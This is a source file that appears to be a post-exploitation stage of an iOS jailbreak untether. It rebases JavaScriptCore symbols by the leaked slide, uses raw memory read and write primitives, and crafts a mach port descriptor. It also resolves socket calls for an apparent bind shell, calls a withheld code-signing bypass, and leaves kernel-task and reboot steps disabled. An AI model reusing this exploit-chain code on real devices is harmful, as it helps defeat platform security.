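// Native symbols resolved through scall_wrapper(): each binding is a callable
// stub forwarding its arguments to the like-named libSystem function.
// socket/bind/listen/accept/dup2/close are resolved but not used anywhere in
// the visible part of this stage — presumably reserved for a later
// bind-shell / stdio-redirect step; verify before relying on them.
var socket = scall_wrapper("socket");
var htons = scall_wrapper("htons");
var inet_addr = scall_wrapper("inet_addr");
var dup2 = scall_wrapper("dup2");
var bind = scall_wrapper("bind");
var listen = scall_wrapper("listen");
var accept = scall_wrapper("accept");
var close = scall_wrapper("close");
var printf = scall_wrapper("printf");
// reboot is resolved here but only referenced from a commented-out line in
// main(); it is a destructive primitive, so keep it disabled unless intended.
var reboot = scall_wrapper("reboot");
// BSD/XNU constants for an AF_INET UDP socket. The original declared
// SOCK_DGRAM twice; the duplicate was dropped (same value, no behavior change).
var AF_INET = 2;
var SOCK_DGRAM = 2;
var IPPROTO_UDP = 17;
// Unslid load address of our own binary; main() adds get_our_slide() << 12
// (slide appears to be page-granular) to obtain the runtime address — TODO
// confirm against the host binary's Mach-O header.
var UNSLID_BASE = 0x4000;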
// Resolve the JavaScriptCore-side handles later stages need. Every assignment
// below is an implicit global (no `var`), so the values are shared with the
// rest of the untether. `scall` goes through sym_cache, which main() populates
// with the three JSC symbols used here before calling this function.
function prep_shit() {
// JSStringRef for the property name "victim".
string_ref = scall("JSStringCreateWithUTF8CString", "victim");
// read_u32(slid + reserve_addr + 0x44) is used as the JSContextRef argument;
// assumed to be the hosting context pointer stashed at that offset — TODO confirm.
global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
// JSObjectRef of the global "victim" property. The trailing NULL is the
// JSValueRef* exception out-parameter, so a thrown exception is silently dropped.
jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
// Native address of large_buf's backing store — presumably a scratch/spray
// buffer allocated earlier; verify where large_buf is created.
large_buf_ptr = leak_vec(large_buf);
}
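// Run the code-signing bypass if this build ships one.
// `csbypass` is an optional global: public builds omit it entirely, so test it
// with typeof rather than `== undefined`, which throws a ReferenceError when the
// identifier was never declared at all. Anything that is not callable
// (undefined, null, a placeholder value) takes the "not distributed" path and
// logs once instead of crashing the stage.
function csbypass_wrapper() {
if (typeof csbypass !== "function") {
p0laris_log("[*] you're probably running a public build of the untether. i don't have permission to distribute this code yet. sorry.");
return;
}
csbypass();
}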
// Stage-4 entry for the code-signing bypass: delegates to csbypass_wrapper()
// and always reports success (0), whether or not a bypass was actually present.
function csbypass_stage4() {
var rc = 0;
csbypass_wrapper();
return rc;
}
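// Stage-4 entry point. Brackets its output with __p0laris_LOG_START__ /
// __p0laris_LOG_END__ markers so a host-side log reader can find this run,
// rebases the three JSC symbols this stage needs, then exercises the
// native_ptr / mach descriptor helpers. The kernel-task and reboot steps
// remain disabled (commented out). Always returns 0.
function main() {
syslog(LOG_SYSLOG, "__p0laris_LOG_START__");
p0laris_log("[*] we out here");
p0laris_log("[*] landed in stage4");
p0laris_log("[*] p0laris.dyld_shc_slide=0x%08x\n", p0laris.dyld_shc_slide);
p0laris_log("[*] p0laris.racoon_slide=0x%08x\n", p0laris.racoon_slide);
// printf = p0laris_log;
printf("test");
// The JSC symbols are stored unslid; add the shared-cache slide so scall()
// resolves them to live addresses before prep_shit() uses them.
var dyld_shc_slide = get_dyld_shc_slide();
sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
prep_shit();
// Self-test of the typed native pointer helpers, all aimed at the slid base of
// our own binary (get_our_slide() looks page-granular, hence << 12). `np` is
// constructed but never read back here; kept in case the constructor matters.
var np = new native_ptr(UNSLID_BASE + (get_our_slide() << 12));
var native_ptr_u16 = native_ptr_type(2, u8x2_to_u16, u16_to_u8x2);
var native_ptr_u32 = native_ptr_type(4, u8x4_to_u32, u32_to_u8x4);
var native_ptr_u16_2 = native_ptr_type(2, u8x2_to_u16, u16_to_u8x2);
var np1 = new native_ptr_u16(UNSLID_BASE + (get_our_slide() << 12));
var np2 = new native_ptr_u32(UNSLID_BASE + (get_our_slide() << 12));
var np3 = new native_ptr_u16_2(UNSLID_BASE + (get_our_slide() << 12));
// Build a 12-byte mach_msg_ool_ports_descriptor_t image: two marker words
// (0x41414141 / 0x42424242) followed by a packed flags word with 19 in bits
// 16..23 and MACH_MSG_OOL_PORTS_DESCRIPTOR in bits 24..31, then read it back
// through the struct view to check the field decoding.
var addy = shit_heap(12);
var np4 = new mach_msg_ool_ports_descriptor_t(addy);
write_u32(addy, 0x41414141);
write_u32(addy + 4, 0x42424242);
write_u32(addy + 8, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
// Stringify first and pass through "%s" so the payload is never interpreted
// as a format string.
p0laris_log("%s", JSON.stringify(np4.deref()));
// p0laris_log("%s", Proxy.toString());
// Three values, three conversions. The original "%x %x %x %x" carried a fourth
// %x with no matching argument; if p0laris_log forwards to a native
// printf-family routine that reads an unrelated word off the stack.
p0laris_log("%x %x %x", np1.deref(), np2.deref(), np3.deref());
// reboot();
// var tfp0 = get_kernel_task();
syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
return 0;
}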